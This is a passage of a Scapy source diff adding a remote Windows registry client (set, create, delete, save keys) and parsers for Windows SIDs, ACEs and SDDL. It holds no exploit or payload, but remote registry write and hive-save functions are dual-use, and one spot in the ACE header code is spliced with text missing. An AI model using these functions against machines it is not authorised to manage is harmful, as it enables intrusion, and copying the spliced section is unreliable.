timeout=timeout, + ) + + if response.status != 0: + log_runtime.error( + "Got status %s while getting version", hex(response.status) + ) + + return response + + def get_key_info( + self, + key_handle: NDRContextHandle, + timeout: int = 5, + ) -> BaseRegQueryInfoKey_Response: + """ + Get information about a given registry key. + + :param hKey: The handle to the registry key (root key or subkey). + :param timeout: The timeout for the request. + :return: The response packet containing the key information. + """ + + response = self.sr1_req( + BaseRegQueryInfoKey_Request( + hKey=key_handle, + lpClassIn=RPC_UNICODE_STRING(), + ), + timeout=timeout, + ) + + if response.status != 0: + log_runtime.error( + "Got status %s while querying key info", hex(response.status) + ) + raise ValueError(response.status) + + return response + + def get_key_security( + self, + key_handle: NDRContextHandle, + security_information: int = None, + timeout: int = 5, + ) -> SECURITY_DESCRIPTOR: + """ + Get the security descriptor of a given registry key. + + :param hKey: The handle to the registry key (root key or subkey). + :param security_information: The security information to retrieve. + :param timeout: The timeout for the request. + :return: The response packet containing the security descriptor. + """ + + if security_information is None: + security_information = ( + 0x00000001 # OWNER_SECURITY_INFORMATION + | 0x00000002 # GROUP_SECURITY_INFORMATION + | 0x00000004 # DACL_SECURITY_INFORMATION + ) + + # Build initial request + req = BaseRegGetKeySecurity_Request( + hKey=key_handle, + SecurityInformation=security_information, + pRpcSecurityDescriptorIn=PRPC_SECURITY_DESCRIPTOR( + cbInSecurityDescriptor=512, # Initial size of the buffer + ), + ) + + # Send request + response = self.sr1_req(req, timeout=timeout) + if response.status == 0x0000007A: # ERROR_INSUFFICIENT_BUFFER + # The buffer was too small, we need to retry with a larger one + req.pRpcSecurityDescriptorIn.cbInSecurityDescriptor = ( + response.pRpcSecurityDescriptorOut.cbInSecurityDescriptor + ) + response = self.sr1_req(req, timeout=timeout) + + # Check the response status + if response.status != 0: + log_runtime.error( + "Got status %s while getting security", hex(response.status) + ) + return None + + return SECURITY_DESCRIPTOR( + response.pRpcSecurityDescriptorOut.valueof("lpSecurityDescriptor") + ) + + def enum_subkeys( + self, + key_handle: NDRContextHandle, + timeout: int = 5, + ) -> List[str]: + """ + Enumerate subkeys of a given registry key. + + :param hKey: The handle to the registry key (root key or subkey). + :param timeout: The timeout for the request. + :return: A generator yielding the responses for each enumerated subkey. + """ + index = 0 + results = [] + + while True: + response = self.sr1_req( + BaseRegEnumKey_Request( + hKey=key_handle, + dwIndex=index, + lpNameIn=RPC_UNICODE_STRING(MaximumLength=1024), + lpClassIn=RPC_UNICODE_STRING(), + lpftLastWriteTime=None, + ), + timeout=timeout, + ) + + # Send request + if response.status == 0x00000103: # ERROR_NO_MORE_ITEMS + break + # Check the response status + elif response.status != 0: + raise ValueError(response.status) + + index += 1 + results.append(response.lpNameOut.valueof("Buffer")[:-1].decode()) + + return results + + def enum_values( + self, + key_handle: NDRContextHandle, + timeout: int = 5, + ) -> List[RegEntry]: + """ + Enumerate values of a given registry key. + + :param hKey: The handle to the registry key (root key or subkey). + :param timeout: The timeout for the request. + :return: A generator yielding the responses for each enumerated value. + """ + index = 0 + results = [] + + while True: + # Get the name and value at index `index` + response = self.sr1_req( + BaseRegEnumValue_Request( + hKey=key_handle, + dwIndex=index, + lpValueNameIn=RPC_UNICODE_STRING( + MaximumLength=2048, + Buffer=NDRPointer( + value=NDRConformantArray( + max_count=1024, value=NDRVaryingArray(value=b"") + ) + ), + ), + lpType=0, # pointer to type, set to 0 for query + lpData=None, # pointer to buffer + lpcbData=0, # pointer to buffer size + lpcbLen=0, # pointer to length + ), + timeout=timeout, + ) + + if response.status == 0x00000103: # ERROR_NO_MORE_ITEMS + break + elif response.status != 0: + raise ValueError(response.status) + + # Get the value name + lpValueName = response.valueof("lpValueNameOut") + + # Get value content + req = BaseRegQueryValue_Request( + hKey=key_handle, + lpValueName=lpValueName, + lpType=0, + lpcbData=1024, + lpcbLen=0, + lpData=NDRPointer( + value=NDRConformantArray( + max_count=1024, + value=NDRVaryingArray(actual_count=0, value=b""), + ) + ), + ) + + # Send request + response = self.sr1_req(req, timeout=timeout) + if response.status == 0x000000EA: # ERROR_MORE_DATA + # The buffer was too small, we need to retry with a larger one + req.lpcbData = response.lpcbData + req.lpData.value.max_count = response.lpcbData.value + response = self.sr1_req(req, timeout=timeout) + + # Check the response status + elif response.status != 0: + raise ValueError(response.status) + + index += 1 + results.append( + RegEntry.frombytes( + lpValueName.valueof("Buffer")[:-1].decode(), + response.valueof("lpType"), + response.valueof("lpData"), + ) + ) + + return results + + def get_value( + self, + key_handle: NDRContextHandle, + value_name: str, + timeout: int = 5, + ) -> RegEntry: + """ + Get the value of a given registry key. + + :param hKey: The handle to the registry key (root key or subkey). + :param value_name: The name of the value to retrieve. + :param timeout: The timeout for the request. + :return: The response packet containing the value data. + """ + + pkt = BaseRegQueryValue_Request( + hKey=key_handle, + lpValueName=value_name, + lpType=0, + lpcbData=1024, + lpcbLen=0, + lpData=NDRPointer( + value=NDRConformantArray( + max_count=1024, value=NDRVaryingArray(actual_count=0, value=b"") + ) + ), + ) + + response = self.sr1_req(pkt, timeout=timeout) + + if response.status == 0x000000EA: # ERROR_MORE_DATA + # The buffer was too small, we need to retry with a larger one + pkt.lpcbData = response.lpcbData + pkt.lpData.value.max_count = response.lpcbData.value + response = self.sr1_req(pkt, timeout=timeout) + + if response.status != 0: + raise ValueError(response.status) + + return RegEntry.frombytes( + value_name, + response.valueof("lpType"), + response.valueof("lpData"), + ) + + def save_subkey( + self, + key_handle: NDRContextHandle, + file_path: str, + security_attributes: PRPC_SECURITY_ATTRIBUTES = None, + timeout: int = 5, + ) -> None: + """ + Save a given registry key to a file. + + :param hKey: The handle to the registry key (root key or subkey). + :param file_path: The path to the file where the key will be saved. + Default path is %WINDIR%\\System32, which is readable by all users. + :param security_attributes: Security attributes for the saved key. + :param timeout: The timeout for the request. + """ + + response = self.sr1_req( + BaseRegSaveKey_Request( + hKey=key_handle, + lpFile=RPC_UNICODE_STRING(Buffer=file_path), + pSecurityAttributes=security_attributes, + ), + timeout=timeout, + ) + + if response.status != 0: + raise ValueError(response.status) + + def set_value( + self, + key_handle: NDRContextHandle, + entry: RegEntry, + timeout: int = 5, + ) -> None: + """ + Set a given value for a registry key. + + :param hKey: The handle to the registry key (root key or subkey). + :param entry: The 'RegEntry' entry to set, containing the name, type and data + of the value. + :param timeout: The timeout for the request. + """ + data = entry.encode() + + response = self.sr1_req( + BaseRegSetValue_Request( + hKey=key_handle, + lpValueName=RPC_UNICODE_STRING( + Buffer=entry.reg_name.encode("utf-8") + b"\x00" + ), + dwType=entry.reg_type.value, + cbData=len(data), + lpData=data, + ), + timeout=timeout, + ) + + if response.status != 0: + raise ValueError(response.status) + + def create_subkey( + self, + root_key_handle: NDRContextHandle, + subkey_path: str, + desired_access_rights: int = 0x2000000, # Maximum allowed + options: RegOptions = RegOptions.REG_OPTION_NON_VOLATILE, + security_attributes: PRPC_SECURITY_ATTRIBUTES = None, + timeout: int = 5, + ) -> NDRContextHandle: + """ + Create a given subkey under a registry key. + + :param client: The DCERPC client. + :param root_key_handle: The handle to the root key. + :param subkey_path: The name of the subkey to create. + :param desired_access_rights: The desired access rights for the subkey. + :param options: The options for the subkey. + :param security_attributes: Security attributes for the created key. + :param timeout: The timeout for the request. + :return: The handle to the created subkey. + """ + + if not str(subkey_path).endswith("\x00"): + subkey_path = str(subkey_path) + "\x00" + + response = self.sr1_req( + BaseRegCreateKey_Request( + hKey=root_key_handle, + lpSubKey=RPC_UNICODE_STRING(Buffer=subkey_path), + samDesired=desired_access_rights, + dwOptions=options, + lpSecurityAttributes=security_attributes, + ), + timeout=timeout, + ) + + if response.status != 0: + raise ValueError(response.status) + + return response.phkResult + + def delete_subkey( + self, + root_key_handle: NDRContextHandle, + subkey_path: str, + timeout: int = 5, + ) -> None: + """ + Delete a given subkey from a registry key. + + :param client: The DCERPC client. + :param hKey: The handle to the root key. + :param subkey_path: The name of the subkey to remove. + :param timeout: The timeout for the request. + """ + + if not str(subkey_path).endswith("\x00"): + subkey_path = str(subkey_path) + "\x00" + + response = self.sr1_req( + BaseRegDeleteKey_Request( + hKey=root_key_handle, + lpSubKey=RPC_UNICODE_STRING(Buffer=subkey_path), + ), + timeout=timeout, + ) + + if response.status != 0: + raise ValueError(response.status) + + def delete_value( + self, + key_handle: NDRContextHandle, + value_name: str, + timeout: int = 5, + ) -> None: + """ + Delete a given value from a registry key. + + :param client: The DCERPC client. + :param hKey: The handle to the subkey to remove. + :param value_name: The name of the value to delete. + :param timeout: The timeout for the request. + """ + + if not str(value_name).endswith("\x00"): + value_name = str(value_name) + "\x00" + + response = self.sr1_req( + BaseRegDeleteValue_Request( + hKey=key_handle, + lpValueName=RPC_UNICODE_STRING(Buffer=value_name), + ), + timeout=timeout, + ) + + if response.status != 0: + raise ValueError(response.status) + + def close_key( + self, + key_handle: NDRContextHandle, + timeout: int = 5, + ) -> None: + """ + Close a given registry key handle. + + :param client: The DCERPC client. + :param hKey: The handle to the registry key (root key or subkey). + :param timeout: The timeout for the request. + """ + + response = self.sr1_req( + BaseRegCloseKey_Request( + hKey=key_handle, + ), + timeout=timeout, + ) + + if response.status != 0: + raise ValueError(response.status) diff --git a/scapy/layers/windows/security.py b/scapy/layers/windows/security.py new file mode 100644 index 00000000000..8606f893c89 --- /dev/null +++ b/scapy/layers/windows/security.py @@ -0,0 +1,931 @@ +# SPDX-License-Identifier: GPL-2.0-only +# This file is part of Scapy +# See https://scapy.net/ for more information +# Copyright (C) Gabriel Potter + +""" +Python objects for Microsoft Windows security structures. +""" + +import re +import struct + +from scapy.config import conf +from scapy.packet import Packet, bind_layers +from scapy.fields import ( + ByteEnumField, + ByteField, + ConditionalField, + FieldLenField, + FieldListField, + FlagsField, + FlagValue, + LEIntField, + LELongField, + LenField, + LEShortEnumField, + LEShortField, + MultipleTypeField, + PacketField, + PacketListField, + ShortField, + StrFieldUtf16, + StrFixedLenField, + StrLenField, + StrLenFieldUtf16, + UUIDField, +) + +from scapy.layers.ntlm import ( + _NTLM_ENUM, + _NTLM_post_build, + _NTLMPayloadField, + _NTLMPayloadPacket, +) + +# [MS-DTYP] sect 2.4.1 + + +class WINNT_SID_IDENTIFIER_AUTHORITY(Packet): + + fields_desc = [ + StrFixedLenField("Value", b"\x00\x00\x00\x00\x00\x01", length=6), + ] + + def default_payload_class(self, payload: bytes) -> Packet: + return conf.padding_layer + + +# [MS-DTYP] sect 2.4.2 + + +class WINNT_SID(Packet): + fields_desc = [ + ByteField("Revision", 1), + FieldLenField("SubAuthorityCount", None, count_of="SubAuthority", fmt="B"), + PacketField( + "IdentifierAuthority", + WINNT_SID_IDENTIFIER_AUTHORITY(), + WINNT_SID_IDENTIFIER_AUTHORITY, + ), + FieldListField( + "SubAuthority", + [0], + LEIntField("", 0), + count_from=lambda pkt: pkt.SubAuthorityCount, + ), + ] + + def default_payload_class(self, payload: bytes) -> Packet: + return conf.padding_layer + + _SID_REG = re.compile(r"^S-(\d)-(\d+)((?:-\d+)*)$") + + @staticmethod + def fromstr(x: str): + """ + Helper to create a SID from its string representation. + + :param x: string representation of the SID like "S-1-5-18" + :type x: str + + Example: + + >>> from scapy.layers.windows.security import WINNT_SID + >>> WINNT_SID.fromstr("S-1-5-18") + SubAuthority=[18] |> + >>> _.summary() + >>> 'S-1-5-18' + """ + + m = WINNT_SID._SID_REG.match(x) + if not m: + raise ValueError("Invalid SID format !") + rev, authority, subauthority = m.groups() + return WINNT_SID( + Revision=int(rev), + IdentifierAuthority=WINNT_SID_IDENTIFIER_AUTHORITY( + Value=struct.pack(">Q", int(authority))[2:] + ), + SubAuthority=[int(x) for x in subauthority[1:].split("-")], + ) + + def summary(self) -> str: + """ + Return the string representation of the SID. + """ + return "S-%s-%s%s" % ( + self.Revision, + struct.unpack(">Q", b"\x00\x00" + self.IdentifierAuthority.Value)[0], + ( + ("-%s" % "-".join(str(x) for x in self.SubAuthority)) + if self.SubAuthority + else "" + ), + ) + + +# https://learn.microsoft.com/en-us/windows-server/identity/ad-ds/manage/understand-security-identifiers + +WELL_KNOWN_SIDS = { + # Universal well-known SID + "S-1-0-0": "Null SID", + "S-1-1-0": "Everyone", + "S-1-2-0": "Local", + "S-1-2-1": "Console Logon", + "S-1-3-0": "Creator Owner ID", + "S-1-3-1": "Creator Group ID", + "S-1-3-2": "Owner Server", + "S-1-3-3": "Group Server", + "S-1-3-4": "Owner Rights", + "S-1-4": "Non-unique Authority", + "S-1-5": "NT Authority", + "S-1-5-80-0": "All Services", + # NT well-known SIDs + "S-1-5-1": "Dialup", + "S-1-5-113": "Local account", + "S-1-5-114": "Local account and member of Administrators group", + "S-1-5-2": "Network", + "S-1-5-3": "Batch", + "S-1-5-4": "Interactive", + "S-1-5-6": "Service", + "S-1-5-7": "Anonymous Logon", + "S-1-5-8": "Proxy", + "S-1-5-9": "Enterprise Domain Controllers", + "S-1-5-10": "Self", + "S-1-5-11": "Authenticated Users", + "S-1-5-12": "Restricted Code", + "S-1-5-13": "Terminal Server User", + "S-1-5-14": "Remote Interactive Logon", + "S-1-5-15": "This Organization", + "S-1-5-17": "IUSR", + "S-1-5-18": "System (or LocalSystem)", + "S-1-5-19": "NT Authority (LocalService)", + "S-1-5-20": "Network Service", + "S-1-5-32-544": "Administrators", + "S-1-5-32-545": "Users", + "S-1-5-32-546": "Guests", + "S-1-5-32-547": "Power Users", + "S-1-5-32-548": "Account Operators", + "S-1-5-32-549": "Server Operators", + "S-1-5-32-550": "Print Operators", + "S-1-5-32-551": "Backup Operators", + "S-1-5-32-552": "Replicators", + "S-1-5-32-554": r"Builtin\Pre-Windows 2000 Compatible Access", + "S-1-5-32-555": r"Builtin\Remote Desktop Users", + "S-1-5-32-556": r"Builtin\Network Configuration Operators", + "S-1-5-32-557": r"Builtin\Incoming Forest Trust Builders", + "S-1-5-32-558": r"Builtin\Performance Monitor Users", + "S-1-5-32-559": r"Builtin\Performance Log Users", + "S-1-5-32-560": r"Builtin\Windows Authorization Access Group", + "S-1-5-32-561": r"Builtin\Terminal Server License Servers", + "S-1-5-32-562": r"Builtin\Distributed COM Users", + "S-1-5-32-568": r"Builtin\IIS_IUSRS", + "S-1-5-32-569": r"Builtin\Cryptographic Operators", + "S-1-5-32-573": r"Builtin\Event Log Readers", + "S-1-5-32-574": r"Builtin\Certificate Service DCOM Access", + "S-1-5-32-575": r"Builtin\RDS Remote Access Servers", + "S-1-5-32-576": r"Builtin\RDS Endpoint Servers", + "S-1-5-32-577": r"Builtin\RDS Management Servers", + "S-1-5-32-578": r"Builtin\Hyper-V Administrators", + "S-1-5-32-579": r"Builtin\Access Control Assistance Operators", + "S-1-5-32-580": r"Builtin\Remote Management Users", + "S-1-5-32-581": r"Builtin\Default Account", + "S-1-5-32-582": r"Builtin\Storage Replica Admins", + "S-1-5-32-583": r"Builtin\Device Owners", + "S-1-5-64-10": "NTLM Authentication", + "S-1-5-64-14": "SChannel Authentication", + "S-1-5-64-21": "Digest Authentication", + "S-1-5-80": "NT Service", + "S-1-5-80-0": "All Services", + "S-1-5-83-0": r"NT VIRTUAL MACHINE\Virtual Machines", +} + + +# [MS-DTYP] sect 2.4.3 + +_WINNT_ACCESS_MASK = { + 0x80000000: "GENERIC_READ", + 0x40000000: "GENERIC_WRITE", + 0x20000000: "GENERIC_EXECUTE", + 0x10000000: "GENERIC_ALL", + 0x02000000: "MAXIMUM_ALLOWED", + 0x01000000: "ACCESS_SYSTEM_SECURITY", + 0x00100000: "SYNCHRONIZE", + 0x00080000: "WRITE_OWNER", + 0x00040000: "WRITE_DACL", + 0x00020000: "READ_CONTROL", + 0x00010000: "DELETE", +} + + +# [MS-DTYP] sect 2.4.4.1 + + +WINNT_ACE_FLAGS = { + 0x01: "OBJECT_INHERIT", + 0x02: "CONTAINER_INHERIT", + 0x04: "NO_PROPAGATE_INHERIT", + 0x08: "INHERIT_ONLY", + 0x10: "INHERITED_ACE", + 0x40: "SUCCESSFUL_ACCESS", + 0x80: "FAILED_ACCESS", +} + + +class WINNT_ACE_HEADER(Packet): + """ + Access Control Entry (ACE) Header + It is composed of 3 fields, followed by ACE-specific data: + + - AceType (1 byte): see below for standard values + - AceFlags (1 byte): see WINNT_ACE_FLAGS + - AceSize (2 bytes): total size of the ACE, including the header + and the ACE-specific data. + """ + + fields_desc = [ + ByteEnumField( + "AceType", + 0, + { + 0x00: "ACCESS_ALLOWED", + 0x01: "ACCESS_DENIED", + 0x02: "SYSTEM_AUDIT", + 0x03: "SYSTEM_ALARM", + 0x04: "ACCESS_ALLOWED_COMPOUND", + 0x05: "ACCESS_ALLOWED_OBJECT", + 0x06: "ACCESS_DENIED_OBJECT", + 0x07: "SYSTEM_AUDIT_OBJECT", + 0x08: "SYSTEM_ALARM_OBJECT", + 0x09: "ACCESS_ALLOWED_CALLBACK", + 0x0A: "ACCESS_DENIED_CALLBACK", + 0x0B: "ACCESS_ALLOWED_CALLBACK_OBJECT", + 0x0C: "ACCESS_DENIED_CALLBACK_OBJECT", + 0x0D: "SYSTEM_AUDIT_CALLBACK", + 0x0E: "SYSTEM_ALARM_CALLBACK", + 0x0F: "SYSTEM_AUDIT_CALLBACK_OBJECT", + 0x10: "SYSTEM_ALARM_CALLBACK_OBJECT", + 0x11: "SYSTEM_MANDATORY_LABEL", + 0x12: "SYSTEM_RESOURCE_ATTRIBUTE", + 0x13: "SYSTEM_SCOPED_POLICY_ID", + }, + ), + FlagsField( + "AceFlags", + 0, + 8, + WINNT_ACE_FLAGS, + ), + LenField("AceSize", None, fmt=" conditional expression + cond_expr = None + if hasattr(self.payload, "ApplicationData"): + # Parse tokens + res = [] + for ct in self.payload.ApplicationData.Tokens: + if ct.TokenType in [ + # binary operators + 0x80, 0x81, 0x82, 0x83, 0x84, 0x85, 0x86, 0x88, 0x8e, 0x8f, + 0xa0, 0xa1 + ]: + t1 = res.pop(-1) + t0 = res.pop(-1) + tt = ct.sprintf("%TokenType%") + if ct.TokenType in [0xa0, 0xa1]: # && and || + res.append(f"({t0}) {tt} ({t1})") + else: + res.append(f"{t0} {tt} {t1}") + elif ct.TokenType in [ + # unary operators + 0x87, 0x8d, 0xa2, 0x89, 0x8a, 0x8b, 0x8c, 0x91, 0x92, 0x93 + ]: + t0 = res.pop(-1) + tt = ct.sprintf("%TokenType%") + res.append(f"{tt}{t0}") + elif ct.TokenType in [ + # values + 0x01, 0x02, 0x03, 0x04, 0x10, 0x18, 0x50, 0x51, 0xf8, 0xf9, + 0xfa, 0xfb + ]: + def lit(ct): + if ct.TokenType in [0x10, 0x18]: # literal strings + return '"%s"' % ct.value + elif ct.TokenType == 0x50: # composite + return "({%s})" % ",".join(lit(x) for x in ct.value) + else: + return str(ct.value) + res.append(lit(ct)) + elif ct.TokenType == 0x00: # padding + pass + else: + raise ValueError("Unhandled token type %s" % ct.TokenType) + if len(res) != 1: + raise ValueError("Incomplete SDDL !") + cond_expr = "(%s)" % res[0] + return { + "ace-flags-string": ace_flag_string, + "sid-string": sid_string, + "mask": mask, + "object-guid": object_guid, + "inherited-object-guid": inherit_object_guid, + "cond-expr": cond_expr, + } + # fmt: on + + def toSDDL(self, accessMask=None): + """ + Return SDDL + """ + data = self.extractData(accessMask=accessMask) + ace_rights = "" # TODO + if self.AceType in [0x9, 0xA, 0xB, 0xD]: # Conditional ACE + conditional_ace_type = { + 0x09: "XA", + 0x0A: "XD", + 0x0B: "XU", + 0x0D: "ZA", + }[self.AceType] + return "D:(%s)" % ( + ";".join( + x + for x in [ + conditional_ace_type, + data["ace-flags-string"], + ace_rights, + str(data["object-guid"]), + str(data["inherited-object-guid"]), + data["sid-string"], + data["cond-expr"], + ] + if x is not None + ) + ) + else: + ace_type = { + 0x00: "A", + 0x01: "D", + 0x02: "AU", + 0x05: "OA", + 0x06: "OD", + 0x07: "OU", + 0x11: "ML", + 0x13: "SP", + }[self.AceType] + return "(%s)" % ( + ";".join( + x + for x in [ + ace_type, + data["ace-flags-string"], + ace_rights, + str(data["object-guid"]), + str(data["inherited-object-guid"]), + data["sid-string"], + data["cond-expr"], + ] + if x is not None + ) + ) + + +# [MS-DTYP] sect 2.4.4.2 + + +class WINNT_ACCESS_ALLOWED_ACE(Packet): + fields_desc = [ + FlagsField("Mask", 0, -32, _WINNT_ACCESS_MASK), + PacketField("Sid", WINNT_SID(), WINNT_SID), + ] + + +bind_layers(WINNT_ACE_HEADER, WINNT_ACCESS_ALLOWED_ACE, AceType=0x00) + + +# [MS-DTYP] sect 2.4.4.3 + + +class WINNT_ACCESS_ALLOWED_OBJECT_ACE(Packet): + fields_desc = [ + FlagsField("Mask", 0, -32, _WINNT_ACCESS_MASK), + FlagsField( + "Flags", + 0, + -32, + { + 0x00000001: "OBJECT_TYPE_PRESENT", + 0x00000002: "INHERITED_OBJECT_TYPE_PRESENT", + }, + ), + ConditionalField( + UUIDField("ObjectType", None, uuid_fmt=UUIDField.FORMAT_LE), + lambda pkt: pkt.Flags.OBJECT_TYPE_PRESENT, + ), + ConditionalField( + UUIDField("InheritedObjectType", None, uuid_fmt=UUIDField.FORMAT_LE), + lambda pkt: pkt.Flags.INHERITED_OBJECT_TYPE_PRESENT, + ), + PacketField("Sid", WINNT_SID(), WINNT_SID), + ] + + +bind_layers(WINNT_ACE_HEADER, WINNT_ACCESS_ALLOWED_OBJECT_ACE, AceType=0x05) + + +# [MS-DTYP] sect 2.4.4.4 + + +class WINNT_ACCESS_DENIED_ACE(Packet): + fields_desc = WINNT_ACCESS_ALLOWED_ACE.fields_desc + + +bind_layers(WINNT_ACE_HEADER, WINNT_ACCESS_DENIED_ACE, AceType=0x01) + + +# [MS-DTYP] sect 2.4.4.5 + + +class WINNT_ACCESS_DENIED_OBJECT_ACE(Packet): + fields_desc = WINNT_ACCESS_ALLOWED_OBJECT_ACE.fields_desc + + +bind_layers(WINNT_ACE_HEADER, WINNT_ACCESS_DENIED_OBJECT_ACE, AceType=0x06) + + +# [MS-DTYP] sect 2.4.4.17.4+ + + +class WINNT_APPLICATION_DATA_LITERAL_TOKEN(Packet): + def default_payload_class(self, payload): + return conf.padding_layer + + +# fmt: off +WINNT_APPLICATION_DATA_LITERAL_TOKEN.fields_desc = [ + ByteEnumField( + "TokenType", + 0, + { + # [MS-DTYP] sect 2.4.4.17.5 + 0x00: "Padding token", + 0x01: "Signed int8", + 0x02: "Signed int16", + 0x03: "Signed int32", + 0x04: "Signed int64", + 0x10: "Unicode", + 0x18: "Octet String", + 0x50: "Composite", + 0x51: "SID", + # [MS-DTYP] sect 2.4.4.17.6 + 0x80: "==", + 0x81: "!=", + 0x82: "<", + 0x83: "<=", + 0x84: ">", + 0x85: ">=", + 0x86: "Contains", + 0x88: "Any_of", + 0x8e: "Not_Contains", + 0x8f: "Not_Any_of", + 0x89: "Member_of", + 0x8a: "Device_Member_of", + 0x8b: "Member_of_Any", + 0x8c: "Device_Member_of_Any", + 0x90: "Not_Member_of", + 0x91: "Not_Device_Member_of", + 0x92: "Not_Member_of_Any", + 0x93: "Not_Device_Member_of_Any", + # [MS-DTYP] sect 2.4.4.17.7 + 0x87: "Exists", + 0x8d: "Not_Exists", + 0xa0: "&&", + 0xa1: "||", + 0xa2: "!", + # [MS-DTYP] sect 2.4.4.17.8 + 0xf8: "Local attribute", + 0xf9: "User Attribute", + 0xfa: "Resource Attribute", + 0xfb: "Device Attribute", + } + ), + ConditionalField( + # Strings + LEIntField("length", 0), + lambda pkt: pkt.TokenType in [ + 0x10, # Unicode string + 0x18, # Octet string + 0xf8, 0xf9, 0xfa, 0xfb, # Attribute tokens + 0x50, # Composite + ] + ), + ConditionalField( + MultipleTypeField( + [ + ( + LELongField("value", 0), + lambda pkt: pkt.TokenType in [ + 0x01, # signed int8 + 0x02, # signed int16 + 0x03, # signed int32 + 0x04, # signed int64 + ] + ), + ( + StrLenFieldUtf16("value", b"", length_from=lambda pkt: pkt.length), + lambda pkt: pkt.TokenType in [ + 0x10, # Unicode string + 0xf8, 0xf9, 0xfa, 0xfb, # Attribute tokens + ] + ), + ( + StrLenField("value", b"", length_from=lambda pkt: pkt.length), + lambda pkt: pkt.TokenType == 0x18, # Octet string + ), + ( + PacketListField("value", [], WINNT_APPLICATION_DATA_LITERAL_TOKEN, + length_from=lambda pkt: pkt.length), + lambda pkt: pkt.TokenType == 0x50, # Composite + ), + + ], + StrFixedLenField("value", b"", length=0), + ), + lambda pkt: pkt.TokenType in [ + 0x01, 0x02, 0x03, 0x04, 0x10, 0x18, 0xf8, 0xf9, 0xfa, 0xfb, 0x50 + ] + ), + ConditionalField( + # Literal + ByteEnumField("sign", 0, { + 0x01: "+", + 0x02: "-", + 0x03: "None", + }), + lambda pkt: pkt.TokenType in [ + 0x01, # signed int8 + 0x02, # signed int16 + 0x03, # signed int32 + 0x04, # signed int64 + ] + ), + ConditionalField( + # Literal + ByteEnumField("base", 0, { + 0x01: "Octal", + 0x02: "Decimal", + 0x03: "Hexadecimal", + }), + lambda pkt: pkt.TokenType in [ + 0x01, # signed int8 + 0x02, # signed int16 + 0x03, # signed int32 + 0x04, # signed int64 + ] + ), +] +# fmt: on + + +class WINNT_APPLICATION_DATA(Packet): + fields_desc = [ + StrFixedLenField("Magic", b"\x61\x72\x74\x78", length=4), + PacketListField( + "Tokens", + [], + WINNT_APPLICATION_DATA_LITERAL_TOKEN, + ), + ] + + def default_payload_class(self, payload): + return conf.padding_layer + + +# [MS-DTYP] sect 2.4.4.6 + + +class WINNT_ACCESS_ALLOWED_CALLBACK_ACE(Packet): + fields_desc = WINNT_ACCESS_ALLOWED_ACE.fields_desc + [ + PacketField( + "ApplicationData", WINNT_APPLICATION_DATA(), WINNT_APPLICATION_DATA + ), + ] + + +bind_layers(WINNT_ACE_HEADER, WINNT_ACCESS_ALLOWED_CALLBACK_ACE, AceType=0x09) + + +# [MS-DTYP] sect 2.4.4.7 + + +class WINNT_ACCESS_DENIED_CALLBACK_ACE(Packet): + fields_desc = WINNT_ACCESS_ALLOWED_CALLBACK_ACE.fields_desc + + +bind_layers(WINNT_ACE_HEADER, WINNT_ACCESS_DENIED_CALLBACK_ACE, AceType=0x0A) + + +# [MS-DTYP] sect 2.4.4.8 + + +class WINNT_ACCESS_ALLOWED_CALLBACK_OBJECT_ACE(Packet): + fields_desc = WINNT_ACCESS_ALLOWED_OBJECT_ACE.fields_desc + [ + PacketField( + "ApplicationData", WINNT_APPLICATION_DATA(), WINNT_APPLICATION_DATA + ), + ] + + +bind_layers(WINNT_ACE_HEADER, WINNT_ACCESS_ALLOWED_CALLBACK_OBJECT_ACE, AceType=0x0B) + + +# [MS-DTYP] sect 2.4.4.9 + + +class WINNT_ACCESS_DENIED_CALLBACK_OBJECT_ACE(Packet): + fields_desc = WINNT_ACCESS_DENIED_OBJECT_ACE.fields_desc + [ + PacketField( + "ApplicationData", WINNT_APPLICATION_DATA(), WINNT_APPLICATION_DATA + ), + ] + + +bind_layers(WINNT_ACE_HEADER, WINNT_ACCESS_DENIED_CALLBACK_OBJECT_ACE, AceType=0x0C) + + +# [MS-DTYP] sect 2.4.4.10 + + +class WINNT_SYSTEM_AUDIT_ACE(Packet): + fields_desc = WINNT_ACCESS_ALLOWED_ACE.fields_desc + + +bind_layers(WINNT_ACE_HEADER, WINNT_SYSTEM_AUDIT_ACE, AceType=0x02) + + +# [MS-DTYP] sect 2.4.4.11 + + +class WINNT_SYSTEM_AUDIT_OBJECT_ACE(Packet): + # doc is wrong. + fields_desc = WINNT_ACCESS_ALLOWED_OBJECT_ACE.fields_desc + + +bind_layers(WINNT_ACE_HEADER, WINNT_SYSTEM_AUDIT_OBJECT_ACE, AceType=0x07) + + +# [MS-DTYP] sect 2.4.4.12 + + +class WINNT_SYSTEM_AUDIT_CALLBACK_ACE(Packet): + fields_desc = WINNT_SYSTEM_AUDIT_ACE.fields_desc + [ + PacketField( + "ApplicationData", WINNT_APPLICATION_DATA(), WINNT_APPLICATION_DATA + ), + ] + + +bind_layers(WINNT_ACE_HEADER, WINNT_SYSTEM_AUDIT_CALLBACK_ACE, AceType=0x0D) + + +# [MS-DTYP] sect 2.4.4.13 + + +class WINNT_SYSTEM_MANDATORY_LABEL_ACE(Packet): + fields_desc = WINNT_SYSTEM_AUDIT_ACE.fields_desc + + +bind_layers(WINNT_ACE_HEADER, WINNT_SYSTEM_MANDATORY_LABEL_ACE, AceType=0x11) + + +# [MS-DTYP] sect 2.4.4.14 + + +class WINNT_SYSTEM_AUDIT_CALLBACK_OBJECT_ACE(Packet): + fields_desc = WINNT_SYSTEM_AUDIT_OBJECT_ACE.fields_desc + + +bind_layers(WINNT_ACE_HEADER, WINNT_SYSTEM_AUDIT_CALLBACK_OBJECT_ACE, AceType=0x0F) + +# [MS-DTYP] sect 2.4.10.1 + + +class CLAIM_SECURITY_ATTRIBUTE_RELATIVE_V1(_NTLMPayloadPacket): + _NTLM_PAYLOAD_FIELD_NAME = "Data" + fields_desc = [ + LEIntField("NameOffset", 0), + LEShortEnumField( + "ValueType", + 0, + { + 0x0001: "CLAIM_SECURITY_ATTRIBUTE_TYPE_INT64", + 0x0002: "CLAIM_SECURITY_ATTRIBUTE_TYPE_UINT64", + 0x0003: "CLAIM_SECURITY_ATTRIBUTE_TYPE_STRING", + 0x0005: "CLAIM_SECURITY_ATTRIBUTE_TYPE_SID", + 0x0006: "CLAIM_SECURITY_ATTRIBUTE_TYPE_BOOLEAN", + 0x0010: "CLAIM_SECURITY_ATTRIBUTE_TYPE_OCTET_STRING", + }, + ), + LEShortField("Reserved", 0), + FlagsField( + "Flags", + 0, + -32, + { + 0x0001: "CLAIM_SECURITY_ATTRIBUTE_NON_INHERITABLE", + 0x0002: "CLAIM_SECURITY_ATTRIBUTE_VALUE_CASE_SENSITIVE", + 0x0004: 